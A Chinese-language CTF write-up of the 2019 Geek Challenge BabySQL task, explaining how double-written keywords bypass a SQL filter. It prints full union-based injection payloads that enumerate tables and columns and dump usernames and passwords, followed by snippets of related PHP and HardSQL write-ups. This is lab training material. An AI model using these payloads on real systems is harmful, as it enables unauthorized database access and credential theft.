極客大挑戰 2019 BabySQL

2022-07-07 20:36:12 字數 951 閱讀 5937

剛看到題目,上面寫著過濾了很多,所以要注意

試探性地先在兩個引數後面加單引號來測試注入點,發現兩個都可以,我選擇了後者

在使用#和--+時發現#被過濾,因為用#時它沒有報錯,但是--+報錯了,所以只能用--+

在『後加order by 1語句時發現返回der 1 ,證明or 和 by 都被過濾掉了,試試雙寫繞過,成功,所以可以繞過,數字增加,到了4不行,說明有三個回顯位

於是正常聯合查詢,但顯示

use near '.tables  table_schema='geek'-- '' at line 1
發現union select也被過濾,試了試from、where也是被過濾了

所以都雙寫繞過

注意因為or被過濾information中的or也雙寫繞過

查詢表playload:' ununionion selselectect 1,2,group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema='geek'--+
同樣方法查詢列,發現and也被過濾,雙寫繞過

查詢列playload:' ununionion selselectect 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns whwhereere table_schema='geek' anandd table_name='b4bsql'--+
同樣方法查出flag

playload:' ununionion selselectect 1,2,concat(id,'-',username,'-',passwoorrd) frfromom geek.b4bsql limit 7,1--+

極客大挑戰 2019 PHP

開啟以後,是三個php原始碼,其中最重要的是class.php,如下 include flag.php error reporting 0 class name function wakeup function destruct if this username admin else 看了一下,這個...

極客大挑戰 2019 HardSQL wp

有過濾,抓個包fuzz一下 等號,空格等被過濾 發現可以用報錯注入,空格可以用括號代替 查表名username admin or extractvalue 1,concat 0x7e,select group concat column name from information schema.co...

極客大挑戰 2019 PHP

剛進入 我們可以看到這樣的乙個介面 根據內容提示,有備份 的習慣 日常後台掃瞄,發現有www.zip檔案,我們進行解壓得到 看到flag.php開啟檢視,發現沒有什麼有用的資訊。我們開啟index.php看看 我們可以看到通過get方式傳入引數select,並對引數select進行反序列化。接下來,...